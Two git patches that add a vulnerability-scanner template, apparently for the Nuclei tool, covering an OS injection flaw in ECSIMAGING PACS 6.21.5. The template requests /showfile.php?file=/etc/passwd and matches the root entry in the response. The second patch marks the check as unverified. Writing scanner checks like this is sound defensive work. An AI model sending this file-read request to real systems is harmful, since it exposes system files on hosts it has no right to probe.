From 70501101a6967e8f398e7d70822fcb28ac117ee8 Mon Sep 17 00:00:00 2001
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com>
Date: Thu, 12 May 2022 13:50:38 +0530
Subject: [PATCH 1/2] Create ecsimagingpacs-rce.yaml

---
 vulnerabilities/other/ecsimagingpacs-rce.yaml | 25 +++++++++++++++++++
 1 file changed, 25 insertions(+)
 create mode 100644 vulnerabilities/other/ecsimagingpacs-rce.yaml

diff --git a/vulnerabilities/other/ecsimagingpacs-rce.yaml b/vulnerabilities/other/ecsimagingpacs-rce.yaml
new file mode 100644
index 0000000000..30312f657b
--- /dev/null
+++ b/vulnerabilities/other/ecsimagingpacs-rce.yaml
@@ -0,0 +1,25 @@
+id: ecsimagingpacs-rce
+
+info:
+  name: ECSIMAGING PACS 6.21.5 - Remote code execution
+  author: ritikchaddha
+  severity: critical
+  description: ECSIMAGING PACS Application in 6.21.5 and bellow suffers from a OS Injection vulnerability. The parameter `file` on the webpage /showfile.php can be exploited with simple OS injection to gain root access. www-data user has sudo NOPASSWD access
+  reference: https://www.exploit-db.com/exploits/49388
+  tags: ecsimagingpacs,rce
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/showfile.php?file=/etc/passwd"
+
+    matchers-condition: and
+    matchers:
+
+      - type: regex
+        regex:
+          - "root:.*:0:0:"
+
+      - type: status
+        status:
+          - 200

From 93c86e4adfa2318ad5f275cba805b65360652b15 Mon Sep 17 00:00:00 2001
From: Prince Chaddha <prince@projectdiscovery.io>
Date: Thu, 12 May 2022 16:38:58 +0530
Subject: [PATCH 2/2] Update ecsimagingpacs-rce.yaml

---
 vulnerabilities/other/ecsimagingpacs-rce.yaml | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)

diff --git a/vulnerabilities/other/ecsimagingpacs-rce.yaml b/vulnerabilities/other/ecsimagingpacs-rce.yaml
index 30312f657b..b102fbcffc 100644
--- a/vulnerabilities/other/ecsimagingpacs-rce.yaml
+++ b/vulnerabilities/other/ecsimagingpacs-rce.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: ECSIMAGING PACS Application in 6.21.5 and bellow suffers from a OS Injection vulnerability. The parameter `file` on the webpage /showfile.php can be exploited with simple OS injection to gain root access. www-data user has sudo NOPASSWD access
   reference: https://www.exploit-db.com/exploits/49388
+  metadata:
+    verified: false
   tags: ecsimagingpacs,rce
 
 requests:
@@ -15,7 +17,6 @@ requests:
 
     matchers-condition: and
     matchers:
-
       - type: regex
         regex:
           - "root:.*:0:0:"